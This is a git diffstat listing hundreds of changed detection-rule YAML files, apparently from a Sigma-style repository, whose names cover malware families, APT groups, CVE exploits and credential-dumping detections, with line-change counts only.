...roc_creation_win_exploit_cve_2017_0261.yml | 6 +- ...oc_creation_win_exploit_cve_2017_11882.yml | 3 +- ...roc_creation_win_exploit_cve_2017_8759.yml | 3 +- .../proc_creation_win_malware_adwind.yml | 16 +- .../proc_creation_win_malware_fireball.yml | 2 +- ..._access_win_malware_verclsid_shellcode.yml | 8 +- .../proc_creation_win_malware_notpetya.yml | 10 +- ...n_win_malware_plugx_susp_exe_locations.yml | 12 +- .../proc_creation_win_malware_wannacry.yml | 64 +- ...oc_creation_win_apt_apt10_cloud_hopper.yml | 7 +- .../proc_creation_win_apt_ta17_293a_ps.yml | 5 +- ...on_win_apt_lazarus_binary_masquerading.yml | 3 +- .../pipe_created_apt_turla_named_pipes.yml | 18 +- .../proc_creation_win_malware_elise.yml | 6 +- ..._creation_win_apt_apt27_emissary_panda.yml | 5 +- .../TA/APT28/proc_creation_win_apt_sofacy.yml | 14 +- ...cozy_bear_phishing_campaign_indicators.yml | 7 +- 
...apt_apt29_phishing_campaign_indicators.yml | 15 +- ...c_creation_win_apt_muddywater_activity.yml | 6 +- .../proc_creation_win_apt_oilrig_mar18.yml | 21 +- .../proc_creation_win_apt_slingshot.yml | 7 +- .../proc_creation_win_apt_tropictrooper.yml | 5 +- ...roc_creation_win_exploit_other_bearlpe.yml | 9 +- ...roc_creation_win_exploit_cve_2019_1378.yml | 3 +- ...roc_creation_win_exploit_cve_2019_1388.yml | 9 +- .../proc_creation_win_malware_babyshark.yml | 15 +- .../proc_creation_win_malware_dridex.yml | 17 +- .../proc_creation_win_malware_dtrack.yml | 6 +- .../proc_creation_win_malware_emotet.yml | 25 +- .../proc_creation_win_malware_formbook.yml | 40 +- ...tion_win_malware_lockergoga_ransomware.yml | 2 +- .../QBot/proc_creation_win_malware_qbot.yml | 7 +- .../Ryuk/proc_creation_win_malware_ryuk.yml | 19 +- ...creation_win_malware_snatch_ransomware.yml | 10 +- ...c_creation_win_apt_aptc12_bluemushroom.yml | 8 +- ...creation_win_apt_apt31_judgement_panda.yml | 9 +- ...c_creation_win_apt_bear_activity_gtr19.yml | 7 +- .../proc_creation_win_apt_empiremonkey.yml | 4 +- ...ation_win_apt_equationgroup_dll_u_load.yml | 11 +- .../proc_creation_win_apt_mustangpanda.yml | 20 +- .../proc_creation_win_apt_wocao.yml | 9 +- ...oc_creation_win_exploit_cve_2020_10189.yml | 3 +- ...roc_creation_win_exploit_cve_2020_1048.yml | 9 +- ...roc_creation_win_exploit_cve_2020_1350.yml | 3 +- ..._creation_win_malware_blue_mockingbird.yml | 8 +- ..._win_malware_emotet_rundll32_execution.yml | 14 +- ...creation_win_malware_ke3chang_tidepool.yml | 10 +- ...c_creation_win_malware_maze_ransomware.yml | 12 +- ...c_creation_win_malware_trickbot_wermgr.yml | 7 +- .../proc_creation_win_apt_evilnum_jul20.yml | 5 +- .../proc_creation_win_apt_gallium_iocs.yml | 83 +- .../proc_creation_win_apt_greenbug_may20.yml | 11 +- ...reation_win_apt_lazarus_group_activity.yml | 22 +- .../proc_creation_win_apt_unc2452_cmds.yml | 20 +- .../proc_creation_win_apt_unc2452_ps.yml | 8 +- 
...ation_win_apt_unc2452_vbscript_pattern.yml | 4 +- .../proc_creation_win_apt_taidoor.yml | 9 +- ...c_creation_win_apt_winnti_mal_hk_jan20.yml | 3 +- .../proc_creation_win_apt_winnti_pipemon.yml | 9 +- ...e_event_win_cve_2021_1675_printspooler.yml | 3 +- ...it_cve_2021_26084_atlassian_confluence.yml | 6 +- ..._win_exploit_cve_2021_26857_msexchange.yml | 4 +- ...le_event_win_cve_2021_26858_msexchange.yml | 8 +- ...ation_win_exploit_cve_2021_35211_servu.yml | 10 +- .../file_event_win_exploit_cve_2021_40444.yml | 3 +- ...oc_creation_win_exploit_cve_2021_40444.yml | 5 +- ..._2021_40444_office_directory_traversal.yml | 6 +- .../file_event_win_cve_2021_41379_msi_lpe.yml | 3 +- ...oc_creation_win_exploit_cve_2021_41379.yml | 21 +- ...t_win_cve_2021_44077_poc_default_files.yml | 4 +- ...n_win_exploit_other_razorinstaller_lpe.yml | 7 +- ...tion_win_exploit_other_systemnightmare.yml | 5 +- ...cve_2021_31979_cve_2021_33771_exploits.yml | 4 +- ...cve_2021_31979_cve_2021_33771_exploits.yml | 4 +- ...ation_win_malware_blackbyte_ransomware.yml | 7 +- .../Conti/proc_creation_win_malware_conti.yml | 2 +- .../proc_creation_win_malware_conti_7zip.yml | 2 +- ..._win_malware_conti_ransomware_commands.yml | 4 +- ...malware_conti_ransomware_database_dump.yml | 14 +- ...eation_win_malware_darkside_ransomware.yml | 2 +- ...ent_win_malware_devil_bait_script_drop.yml | 7 +- ...win_malware_devil_bait_output_redirect.yml | 12 +- .../image_load_malware_foggyweb_nobelium.yml | 3 +- ...win_malware_goofy_guineapig_broken_cmd.yml | 5 +- ...g_googleupdate_uncommon_child_instance.yml | 11 +- .../file_event_win_moriya_rootkit.yml | 8 +- ...le_event_win_malware_pingback_backdoor.yml | 11 +- .../image_load_malware_pingback_backdoor.yml | 11 +- ...creation_win_malware_pingback_backdoor.yml | 13 +- ...t_win_malware_small_sieve_evasion_typo.yml | 3 +- ...eation_win_malware_small_sieve_cli_arg.yml | 5 +- ...y_set_malware_small_sieve_evasion_typo.yml | 7 +- .../HAFNIUM/proc_creation_win_apt_hafnium.yml | 25 
+- .../proc_creation_win_apt_revil_kaseya.yml | 7 +- .../image_load_usp_svchost_clfsw32.yml | 3 +- .../proc_creation_win_apt_sourgrum.yml | 4 +- .../file_event_win_cve_2022_24527_lpe.yml | 5 +- ...2022_26809_rpcss_child_process_anomaly.yml | 4 +- ...eation_win_exploit_cve_2022_29072_7zip.yml | 20 +- ..._win_exploit_cve_2022_41120_sysmon_eop.yml | 11 +- ...on_win_malware_hermetic_wiper_activity.yml | 17 +- ...raspberry_robin_single_dot_ending_file.yml | 8 +- ..._creation_win_apt_actinium_persistence.yml | 5 +- .../MERCURY/proc_creation_win_apt_mercury.yml | 4 +- ...023_22518_confluence_tomcat_child_proc.yml | 24 +- ...ve_2023_23397_outlook_reminder_trigger.yml | 5 +- ...ile_event_win_cve_2023_27363_foxit_rce.yml | 3 +- ...exploit_cve_2023_34362_moveit_transfer.yml | 4 + ...exploit_cve_2023_36874_report_creation.yml | 4 +- ...exploit_cve_2023_36874_wermgr_creation.yml | 7 +- ...win_exploit_cve_2023_36874_fake_wermgr.yml | 4 +- ..._office_windows_html_rce_file_patterns.yml | 3 +- ..._cve_2023_38331_winrar_susp_double_ext.yml | 7 +- ...ploit_cve_2023_38831_winrar_child_proc.yml | 30 +- ...t_cve_2023_40477_winrar_rev_file_abuse.yml | 6 +- ...loit_other_win_server_undocumented_rce.yml | 7 +- ...vent_win_malware_coldsteel_renamed_cmd.yml | 3 +- ...malware_coldsteel_service_dll_creation.yml | 3 +- ...ware_coldsteel_persistence_service_dll.yml | 7 +- ...in_malware_coldsteel_anonymous_process.yml | 3 +- ...creation_win_malware_coldsteel_cleanup.yml | 6 +- ..._malware_coldsteel_service_persistence.yml | 5 +- ...ry_set_malware_coldsteel_created_users.yml | 3 +- ...lware_darkgate_autoit3_binary_creation.yml | 15 +- ..._autoit3_from_susp_parent_and_location.yml | 15 +- ...win_malware_darkgate_net_user_creation.yml | 6 +- ..._creation_win_malware_griffon_patterns.yml | 5 +- ...ware_icedid_rundll32_dllregisterserver.yml | 10 +- ..._win_malware_pikabot_rundll32_activity.yml | 15 +- ...re_pikabot_combined_commands_execution.yml | 24 +- ...win_malware_pikabot_rundll32_discovery.yml | 
17 +- ...win_malware_pikabot_rundll32_hollowing.yml | 11 +- ...n_malware_qakbot_regsvr32_calc_pattern.yml | 8 +- ..._win_malware_qakbot_rundll32_execution.yml | 9 +- ...on_win_malware_qakbot_rundll32_exports.yml | 14 +- ...are_qakbot_rundll32_fake_dll_execution.yml | 10 +- ...win_malware_qakbot_uninstaller_cleanup.yml | 17 +- ...alware_rhadamanthys_stealer_dll_launch.yml | 12 +- ..._malware_rorschach_ransomware_activity.yml | 2 +- ...event_win_malware_snake_installers_ioc.yml | 6 +- ...nt_win_malware_snake_werfault_creation.yml | 3 +- ...n_win_malware_snake_installer_cli_args.yml | 9 +- ...ation_win_malware_snake_installer_exec.yml | 9 +- ...on_win_malware_snake_service_execution.yml | 4 +- ...y_event_malware_snake_covert_store_key.yml | 3 +- ...gistry_set_malware_snake_encrypted_key.yml | 11 +- ...win_malware_socgholish_second_stage_c2.yml | 7 +- .../dns_query_win_malware_3cx_compromise.yml | 31 +- ...e_load_malware_3cx_compromise_susp_dll.yml | 65 +- ...ware_3cx_compromise_beaconing_activity.yml | 31 +- ...n_win_malware_3cx_compromise_execution.yml | 91 +- ...n_malware_3cx_compromise_susp_children.yml | 31 +- ...win_malware_3cx_compromise_susp_update.yml | 33 +- ...query_win_apt_diamond_steel_indicators.yml | 3 +- ...ation_win_apt_diamond_sleet_indicators.yml | 5 +- ...event_apt_diamond_sleet_scheduled_task.yml | 6 +- ...7_powershell_scripts_naming_convention.yml | 7 +- ...n_apt_fin7_powertrash_lateral_movement.yml | 7 +- ..._event_win_apt_lace_tempest_indicators.yml | 13 +- ...pt_lace_tempest_cobalt_strike_download.yml | 5 +- ..._win_apt_lace_tempest_loader_execution.yml | 3 +- ...ge_load_apt_lazarus_side_load_activity.yml | 3 +- ...storm_aspera_faspex_susp_child_process.yml | 109 +- ...storm_manage_engine_susp_child_process.yml | 112 +- ...ation_win_apt_mustang_panda_indicators.yml | 7 +- ...int_management_exploitation_indicators.yml | 4 +- ...t_print_management_exploitation_pc_app.yml | 3 +- ...ion_win_apt_peach_sandstorm_indicators.yml | 2 +- 
.../file_change_win_2022_timestomping.yml | 29 +- ...ge_win_unusual_modification_by_dns_exe.yml | 8 +- ...lete_win_cve_2021_1675_print_nightmare.yml | 3 +- .../file_delete_win_delete_backup_file.yml | 4 +- ...file_delete_win_delete_event_log_files.yml | 3 +- ...te_win_delete_exchange_powershell_logs.yml | 3 +- ...file_delete_win_delete_iis_access_logs.yml | 3 +- ..._win_delete_powershell_command_history.yml | 3 +- .../file_delete_win_delete_prefetch.yml | 5 +- ...file_delete_win_delete_teamviewer_logs.yml | 3 +- .../file_delete_win_delete_tomcat_logs.yml | 3 +- ...win_sysinternals_sdelete_file_deletion.yml | 3 +- ...delete_win_unusual_deletion_by_dns_exe.yml | 8 +- ...elete_win_zone_identifier_ads_uncommon.yml | 9 +- .../file_event_win_access_susp_teams.yml | 3 +- ...ile_event_win_access_susp_unattend_xml.yml | 10 +- ...n_adsi_cache_creation_by_uncommon_tool.yml | 34 +- .../file_event_win_advanced_ip_scanner.yml | 7 +- .../file_event_win_anydesk_artefact.yml | 16 +- ...vent_win_anydesk_writing_susp_binaries.yml | 13 +- .../file_event_win_aspnet_temp_files.yml | 21 +- .../file_event_win_bloodhound_collection.yml | 6 +- .../file_event_win_crackmapexec_patterns.yml | 8 +- ...t_win_create_evtx_non_common_locations.yml | 7 +- ...ile_event_win_create_non_existent_dlls.yml | 11 +- ...e_event_win_creation_new_shim_database.yml | 11 +- ...ile_event_win_creation_scr_binary_file.yml | 13 +- .../file_event_win_creation_system_file.yml | 8 +- ...ent_win_creation_unquoted_service_path.yml | 12 +- ...vent_win_cred_dump_tools_dropped_files.yml | 57 +- ...file_event_win_cscript_wscript_dropper.yml | 7 +- .../file_event_win_csexec_service.yml | 3 +- ...file_event_win_csharp_compile_artefact.yml | 11 +- ...ile_event_win_dcom_iertutil_dll_hijack.yml | 11 +- ...e_event_win_dll_sideloading_space_path.yml | 10 +- ...file_event_win_dump_file_susp_creation.yml | 12 +- ...ile_event_win_errorhandler_persistence.yml | 10 +- .../file_event_win_exchange_webshell_drop.yml | 13 +- 
..._win_exchange_webshell_drop_suspicious.yml | 6 +- .../file_event_win_gotoopener_artefact.yml | 19 +- .../file_event_win_hktl_dumpert.yml | 7 +- ...nt_win_hktl_hivenightmare_file_exports.yml | 16 +- .../file_event_win_hktl_mimikatz_files.yml | 11 +- .../file_event/file_event_win_hktl_nppspy.yml | 3 +- ...le_event_win_hktl_powerup_dllhijacking.yml | 16 +- .../file_event_win_hktl_remote_cred_dump.yml | 4 +- ...tial_access_dll_search_order_hijacking.yml | 6 +- ...ile_event_win_iphlpapi_dll_sideloading.yml | 6 +- .../file_event_win_iso_file_mount.yml | 3 +- .../file_event_win_iso_file_recent.yml | 10 +- ...lbin_gather_network_info_script_output.yml | 11 +- ...vent_win_lsass_default_dump_file_names.yml | 18 +- .../file_event_win_lsass_shtinkering.yml | 7 +- .../file_event_win_lsass_werfault_dump.yml | 3 +- .../file_event/file_event_win_mal_adwind.yml | 16 +- .../file_event_win_msdt_susp_directories.yml | 3 +- .../file_event_win_net_cli_artefact.yml | 18 +- ...n_new_files_in_uncommon_appdata_folder.yml | 6 +- .../file_event_win_new_scr_file.yml | 6 +- ...vent_win_notepad_plus_plus_persistence.yml | 5 +- ...t_win_ntds_dit_uncommon_parent_process.yml | 13 +- ...le_event_win_ntds_dit_uncommon_process.yml | 8 +- .../file_event_win_ntds_exfil_tools.yml | 7 +- ...ile_event_win_office_addin_persistence.yml | 3 +- ...e_event_win_office_macro_files_created.yml | 4 +- ...vent_win_office_macro_files_downloaded.yml | 39 +- ...n_office_macro_files_from_susp_process.yml | 29 +- ...office_onenote_files_in_susp_locations.yml | 4 +- ..._win_office_onenote_susp_dropped_files.yml | 11 +- ...vent_win_office_outlook_macro_creation.yml | 4 +- .../file_event_win_office_outlook_newform.yml | 5 +- ...win_office_outlook_susp_macro_creation.yml | 4 +- ...fice_publisher_files_in_susp_locations.yml | 3 +- ...e_event_win_office_startup_persistence.yml | 26 +- ...e_event_win_office_susp_file_extension.yml | 12 +- ...event_win_office_uncommon_file_startup.yml | 45 +- 
.../file_event_win_perflogs_susp_files.yml | 3 +- ...t_win_powershell_drop_binary_or_script.yml | 4 +- ...e_event_win_powershell_drop_powershell.yml | 7 +- ...e_event_win_powershell_exploit_scripts.yml | 14 +- ...e_event_win_powershell_module_creation.yml | 3 +- ...nt_win_powershell_module_susp_creation.yml | 9 +- ...in_powershell_module_uncommon_creation.yml | 7 +- ...event_win_powershell_startup_shortcuts.yml | 21 +- ...licy_test_creation_by_uncommon_process.yml | 4 +- .../file_event_win_rdp_file_susp_creation.yml | 7 +- .../file_event_win_remcom_service.yml | 3 +- ...te_access_tools_screenconnect_artefact.yml | 18 +- ...access_tools_screenconnect_remote_file.yml | 17 +- .../file_event_win_ripzip_attack.yml | 17 +- .../file_event/file_event_win_sam_dump.yml | 45 +- ...e_event_win_shell_write_susp_directory.yml | 8 +- ..._win_shell_write_susp_files_extensions.yml | 4 +- ...le_event_win_startup_folder_file_write.yml | 15 +- ...e_event_win_susp_default_gpo_dir_write.yml | 3 +- .../file_event_win_susp_desktop_ini.yml | 4 +- ..._event_win_susp_desktopimgdownldr_file.yml | 6 +- .../file_event_win_susp_diagcab.yml | 3 +- .../file_event_win_susp_double_extension.yml | 18 +- ...ile_event_win_susp_exchange_aspx_write.yml | 4 +- ...ile_event_win_susp_executable_creation.yml | 4 +- .../file_event_win_susp_get_variable.yml | 11 +- ...t_win_susp_hidden_dir_index_allocation.yml | 12 +- ...file_event_win_susp_homoglyph_filename.yml | 114 +- ...n_susp_legitimate_app_dropping_archive.yml | 8 +- ...t_win_susp_legitimate_app_dropping_exe.yml | 8 +- ...in_susp_legitimate_app_dropping_script.yml | 8 +- ...le_event_win_susp_lnk_double_extension.yml | 15 +- .../file_event_win_susp_pfx_file_creation.yml | 3 +- ...file_event_win_susp_powershell_profile.yml | 3 +- ...cexplorer_driver_created_in_tmp_folder.yml | 15 +- ...e_event_win_susp_recycle_bin_fake_exec.yml | 21 +- ...vent_win_susp_spool_drivers_color_drop.yml | 3 +- ...nt_win_susp_startup_folder_persistence.yml | 8 +- 
...win_susp_system_interactive_powershell.yml | 3 +- .../file_event_win_susp_task_write.yml | 3 +- ...ent_win_susp_vscode_powershell_profile.yml | 8 +- ...vent_win_susp_windows_terminal_profile.yml | 4 +- ..._event_win_susp_winsxs_binary_creation.yml | 4 +- ..._sysinternals_livekd_default_dump_name.yml | 7 +- ...e_event_win_sysinternals_livekd_driver.yml | 3 +- ...sinternals_livekd_driver_susp_creation.yml | 10 +- ...internals_procexp_driver_susp_creation.yml | 11 +- ...internals_procmon_driver_susp_creation.yml | 3 +- ..._event_win_sysinternals_psexec_service.yml | 7 +- ...nt_win_sysinternals_psexec_service_key.yml | 4 +- ...em32_local_folder_privilege_escalation.yml | 3 +- .../file_event_win_taskmgr_lsass_dump.yml | 7 +- ...e_event_win_tsclient_filewrite_startup.yml | 3 +- ..._event_win_uac_bypass_consent_comctl32.yml | 3 +- ...e_event_win_uac_bypass_dotnet_profiler.yml | 3 +- .../file_event_win_uac_bypass_eventvwr.yml | 1 + ...ent_win_uac_bypass_idiagnostic_profile.yml | 3 +- ...vent_win_uac_bypass_ntfs_reparse_point.yml | 3 +- .../file_event_win_uac_bypass_winsat.yml | 3 +- .../file_event_win_uac_bypass_wmp.yml | 3 +- ...le_event_win_vhd_download_via_browsers.yml | 10 +- ...scode_tunnel_remote_creation_artefacts.yml | 6 +- ...nt_win_vscode_tunnel_renamed_execution.yml | 8 +- ...ile_event_win_webshell_creation_detect.yml | 20 +- .../file_event_win_werfault_dll_hijacking.yml | 3 +- .../file_event_win_winrm_awl_bypass.yml | 7 +- ...ile_event_win_wmiexec_default_filename.yml | 9 +- ...event_win_wmiprvse_wbemcomn_dll_hijack.yml | 3 +- .../file_event_win_wpbbin_persistence.yml | 6 +- ...le_event_win_writing_local_admin_share.yml | 7 +- ...load_cmstp_load_dll_from_susp_location.yml | 1 + ...image_load_dll_amsi_suspicious_process.yml | 4 +- ...rosoft_account_token_provider_dll_load.yml | 25 +- ...msvcs_load_renamed_version_by_rundll32.yml | 11 +- ..._load_dll_credui_uncommon_process_load.yml | 18 +- ...age_load_dll_dbghelp_dbgcore_susp_load.yml | 29 +- 
...load_dll_dbghelp_dbgcore_unsigned_load.yml | 19 +- ...mage_load_dll_rstrtmgr_suspicious_load.yml | 40 +- .../image_load_dll_rstrtmgr_uncommon_load.yml | 21 +- .../image_load_dll_sdiageng_load_by_msdt.yml | 3 +- ...system_management_automation_susp_load.yml | 31 +- .../image_load_dll_tttracer_module_load.yml | 5 +- .../image_load_dll_vss_ps_susp_load.yml | 15 +- .../image_load_dll_vssapi_susp_load.yml | 31 +- .../image_load_dll_vsstrace_susp_load.yml | 25 +- .../image_load_hktl_sharpevtmute.yml | 11 +- .../image_load_hktl_silenttrinity_stager.yml | 4 +- ...load_iexplore_dcom_iertutil_dll_hijack.yml | 11 +- ...e_load_office_dotnet_assembly_dll_load.yml | 2 +- .../image_load_office_dotnet_clr_dll_load.yml | 2 +- .../image_load_office_dotnet_gac_dll_load.yml | 2 +- .../image_load_office_dsparse_dll_load.yml | 2 +- .../image_load_office_excel_xll_susp_load.yml | 11 +- .../image_load_office_kerberos_dll_load.yml | 2 +- ...image_load_office_outlook_outlvba_load.yml | 3 +- .../image_load_office_powershell_dll_load.yml | 2 +- .../image_load_office_vbadll_load.yml | 5 +- ...e_load_scrcons_wmi_scripteventconsumer.yml | 7 +- .../image_load/image_load_side_load_7za.yml | 4 +- ..._load_side_load_abused_dlls_susp_paths.yml | 28 +- .../image_load_side_load_antivirus.yml | 27 +- ...aruba_networks_virtual_intranet_access.yml | 3 +- .../image_load_side_load_ccleaner_du.yml | 3 +- ...ge_load_side_load_ccleaner_reactivator.yml | 3 +- ...image_load_side_load_classicexplorer32.yml | 3 +- .../image_load_side_load_comctl32.yml | 3 +- .../image_load_side_load_coregen.yml | 3 +- ...side_load_cpl_from_non_system_location.yml | 7 +- .../image_load_side_load_dbgcore_dll.yml | 5 +- .../image_load_side_load_dbghelp_dll.yml | 5 +- ...oad_side_load_from_non_system_location.yml | 18 +- .../image_load_side_load_goopdate.yml | 4 +- .../image_load_side_load_gup_libcurl.yml | 3 +- .../image_load_side_load_iviewers.yml | 3 +- .../image_load_side_load_libvlc.yml | 3 +- 
.../image_load_side_load_mfdetours.yml | 4 +- ...mage_load_side_load_mfdetours_unsigned.yml | 8 +- ...image_load_side_load_non_existent_dlls.yml | 17 +- .../image_load_side_load_office_dlls.yml | 5 +- ...side_load_rjvplatform_default_location.yml | 4 +- ..._load_rjvplatform_non_default_location.yml | 3 +- .../image_load_side_load_robform.yml | 6 +- .../image_load_side_load_shell_chrome_api.yml | 16 +- .../image_load_side_load_shelldispatch.yml | 8 +- .../image_load_side_load_smadhook.yml | 3 +- .../image_load_side_load_third_party.yml | 24 +- .../image_load_side_load_ualapi.yml | 3 +- .../image_load_side_load_vmguestlib.yml | 3 +- ...ge_load_side_load_vmmap_dbghelp_signed.yml | 7 +- ..._load_side_load_vmmap_dbghelp_unsigned.yml | 7 +- .../image_load_side_load_vmware_xfer.yml | 5 +- .../image_load_side_load_waveedit.yml | 3 +- .../image_load/image_load_side_load_wazuh.yml | 8 +- .../image_load_side_load_windows_defender.yml | 7 +- ..._susp_clickonce_unsigned_module_loaded.yml | 4 +- ...mage_load_susp_dll_load_system_process.yml | 5 +- .../image_load_susp_python_image_load.yml | 15 +- ...e_load_susp_script_dotnet_clr_dll_load.yml | 4 +- .../image_load_susp_uncommon_image_load.yml | 3 +- .../image_load_thor_unsigned_execution.yml | 3 +- .../image_load_uac_bypass_iscsicpl.yml | 4 +- ...ge_load_wmic_remote_xsl_scripting_dlls.yml | 9 +- ...mage_load_wmiprvse_wbemcomn_dll_hijack.yml | 3 +- .../image_load_wsman_provider_image_load.yml | 30 +- .../net_connection_win_addinutil.yml | 3 +- .../net_connection_win_binary_susp_com.yml | 18 +- ...tion_win_certutil_initiated_connection.yml | 6 +- ...net_connection_win_crypto_mining_pools.yml | 34 +- ...net_connection_win_dead_drop_resolvers.yml | 26 +- ...et_connection_win_devtunnel_connection.yml | 19 +- ...et_connection_win_dfsvc_uncommon_ports.yml | 3 +- ...connection_win_dllhost_net_connections.yml | 19 +- ..._win_excel_outbound_network_connection.yml | 23 +- ...tion_win_google_api_non_browser_access.yml | 19 +- 
.../net_connection_win_hh.yml | 7 +- .../net_connection_win_imewdbld.yml | 8 +- .../net_connection_win_mega_nz.yml | 3 +- .../net_connection_win_msiexec.yml | 9 +- .../net_connection_win_ngrok_domains.yml | 3 +- .../net_connection_win_ngrok_tunnel.yml | 3 +- ...tion_win_notion_api_susp_communication.yml | 17 +- .../net_connection_win_office_susp_ports.yml | 3 +- ...tion_win_powershell_network_connection.yml | 20 +- .../net_connection_win_python.yml | 16 +- ...n_rdp_outbound_over_non_standard_tools.yml | 9 +- .../net_connection_win_rdp_reverse_tunnel.yml | 7 +- .../net_connection_win_rdp_to_http.yml | 3 +- ...tion_win_reddit_api_non_browser_access.yml | 20 +- ..._win_remote_powershell_session_network.yml | 29 +- ...onnection_win_rundll32_net_connections.yml | 55 +- .../net_connection_win_script.yml | 3 +- .../net_connection_win_script_wan.yml | 23 +- ..._connection_win_susp_binary_no_cmdline.yml | 11 +- .../net_connection_win_susp_dropbox_api.yml | 3 +- .../net_connection_win_susp_epmap.yml | 6 +- ...connection_win_susp_external_ip_lookup.yml | 18 +- ...nection_win_susp_malware_callback_port.yml | 13 +- ...n_susp_malware_callback_ports_uncommon.yml | 7 +- ..._win_susp_outbound_kerberos_connection.yml | 11 +- ...n_win_susp_outbound_mobsync_connection.yml | 3 +- ...ion_win_susp_outbound_smtp_connections.yml | 10 +- ..._susp_prog_location_network_connection.yml | 8 +- ...on_win_telegram_api_non_browser_access.yml | 18 +- ...onnection_win_vscode_tunnel_connection.yml | 19 +- ...onnection_win_winlogon_net_connections.yml | 6 +- ...nection_win_wuauclt_network_connection.yml | 39 +- ...dfs_namedpipe_connection_uncommon_tool.yml | 17 +- .../pipe_created_hktl_cobaltstrike.yml | 18 +- .../pipe_created_hktl_cobaltstrike_re.yml | 58 +- ...d_hktl_cobaltstrike_susp_pipe_patterns.yml | 68 +- .../pipe_created_hktl_coercedpotato.yml | 7 +- .../pipe_created_hktl_diagtrack_eop.yml | 12 +- .../pipe_created_hktl_efspotato.yml | 13 +- ...ted_hktl_generic_cred_dump_tools_pipes.yml | 10 +- 
.../pipe_created_hktl_koh_default_pipe.yml | 7 +- ...created_powershell_alternate_host_pipe.yml | 27 +- ...pipe_created_powershell_execution_pipe.yml | 14 +- .../pipe_created_pua_csexec_default_pipe.yml | 11 +- .../pipe_created_pua_paexec_default_pipe.yml | 7 +- .../pipe_created_pua_remcom_default_pipe.yml | 11 +- ...created_scrcons_wmi_consumer_namedpipe.yml | 7 +- ...pipe_created_susp_malicious_namedpipes.yml | 62 +- ...nals_psexec_default_pipe_susp_location.yml | 20 +- ...on_win_userdomain_variable_enumeration.yml | 2 +- ...c_access_win_cmstp_execution_by_access.yml | 4 +- ...ktl_cobaltstrike_bof_injection_pattern.yml | 3 +- .../proc_access_win_hktl_generic_access.yml | 179 +- ...ccess_win_hktl_handlekatz_lsass_access.yml | 8 +- .../proc_access_win_hktl_sysmonente.yml | 3 +- ...proc_access_win_lsass_dump_comsvcs_dll.yml | 3 +- ...oc_access_win_lsass_dump_keyword_image.yml | 5 +- .../proc_access_win_lsass_memdump.yml | 22 +- ...roc_access_win_lsass_python_based_tool.yml | 11 +- ...s_win_lsass_remote_access_trough_winrm.yml | 3 +- .../proc_access_win_lsass_seclogon_access.yml | 6 +- ...proc_access_win_lsass_susp_access_flag.yml | 90 +- .../proc_access_win_lsass_werfault.yml | 4 +- ...ss_win_lsass_whitelisted_process_names.yml | 15 +- ...ess_win_susp_direct_ntopenprocess_call.yml | 13 +- ...roc_access_win_susp_invoke_patchingapi.yml | 24 +- ...oc_access_win_susp_shellcode_injection.yml | 16 +- ..._access_win_svchost_credential_dumping.yml | 3 +- ...access_win_svchost_susp_access_request.yml | 4 +- ...in_uac_bypass_editionupgrademanagerobj.yml | 3 +- ...roc_access_win_uac_bypass_wow64_logger.yml | 3 +- ...proc_creation_win_7zip_exfil_dmp_files.yml | 28 +- ...creation_win_7zip_password_compression.yml | 23 +- ..._creation_win_7zip_password_extraction.yml | 24 +- ...ation_win_addinutil_suspicious_cmdline.yml | 24 +- ...n_win_addinutil_uncommon_child_process.yml | 7 +- ...reation_win_addinutil_uncommon_cmdline.yml | 16 +- ...eation_win_addinutil_uncommon_dir_exec.yml | 
7 +- .../proc_creation_win_adplus_memory_dump.yml | 13 +- ...tion_win_agentexecutor_potential_abuse.yml | 28 +- ..._creation_win_agentexecutor_susp_usage.yml | 27 +- ...tion_win_appvlp_uncommon_child_process.yml | 18 +- ...creation_win_aspnet_compiler_exectuion.yml | 17 +- ...win_aspnet_compiler_susp_child_process.yml | 37 +- ...reation_win_aspnet_compiler_susp_paths.yml | 20 +- ..._creation_win_at_interactive_execution.yml | 5 +- .../proc_creation_win_attrib_hiding_files.yml | 13 +- .../proc_creation_win_attrib_system.yml | 13 +- ..._creation_win_attrib_system_susp_paths.yml | 26 +- ...ion_win_auditpol_nt_resource_kit_usage.yml | 21 +- ...c_creation_win_auditpol_susp_execution.yml | 31 +- ...oc_creation_win_bash_command_execution.yml | 14 +- .../proc_creation_win_bash_file_execution.yml | 25 +- ..._creation_win_bcdedit_boot_conf_tamper.yml | 22 +- ...oc_creation_win_bcdedit_susp_execution.yml | 6 +- ...on_win_bginfo_suspicious_child_process.yml | 39 +- ...tion_win_bginfo_uncommon_child_process.yml | 7 +- .../proc_creation_win_bitsadmin_download.yml | 10 +- ...ation_win_bitsadmin_download_direct_ip.yml | 17 +- ...itsadmin_download_file_sharing_domains.yml | 10 +- ...win_bitsadmin_download_susp_extensions.yml | 8 +- ...n_bitsadmin_download_susp_targetfolder.yml | 11 +- ...tsadmin_download_uncommon_targetfolder.yml | 8 +- ...on_win_bitsadmin_potential_persistence.yml | 15 +- ...n_browsers_chromium_headless_debugging.yml | 12 +- ...on_win_browsers_chromium_headless_exec.yml | 6 +- ...owsers_chromium_headless_file_download.yml | 9 +- ...n_win_browsers_chromium_load_extension.yml | 12 +- ...on_win_browsers_chromium_mockbin_abuse.yml | 8 +- ..._browsers_chromium_susp_load_extension.yml | 9 +- ...tion_win_browsers_inline_file_download.yml | 9 +- ...creation_win_browsers_remote_debugging.yml | 12 +- .../proc_creation_win_calc_uncommon_exec.yml | 12 +- ...n_win_certmgr_certificate_installation.yml | 28 +- .../proc_creation_win_certoc_download.yml | 10 +- 
...creation_win_certoc_download_direct_ip.yml | 12 +- .../proc_creation_win_certoc_load_dll.yml | 13 +- ...ion_win_certoc_load_dll_susp_locations.yml | 15 +- ..._win_certutil_certificate_installation.yml | 30 +- .../proc_creation_win_certutil_decode.yml | 12 +- .../proc_creation_win_certutil_download.yml | 18 +- ...eation_win_certutil_download_direct_ip.yml | 44 +- ...certutil_download_file_sharing_domains.yml | 21 +- .../proc_creation_win_certutil_encode.yml | 15 +- ...on_win_certutil_encode_susp_extensions.yml | 15 +- ...tion_win_certutil_encode_susp_location.yml | 16 +- .../proc_creation_win_certutil_export_pfx.yml | 15 +- ...oc_creation_win_certutil_ntlm_coercion.yml | 6 +- ...proc_creation_win_chcp_codepage_lookup.yml | 8 +- ...proc_creation_win_chcp_codepage_switch.yml | 16 +- ...tion_win_cipher_overwrite_deleted_data.yml | 20 +- ...ion_win_citrix_trolleyexpress_procdump.yml | 9 +- .../proc_creation_win_clip_execution.yml | 8 +- ...ion_win_cloudflared_portable_execution.yml | 6 +- ..._win_cloudflared_quicktunnel_execution.yml | 122 +- ...reation_win_cloudflared_tunnel_cleanup.yml | 7 +- ...oc_creation_win_cloudflared_tunnel_run.yml | 8 +- .../proc_creation_win_cmd_assoc_execution.yml | 23 +- 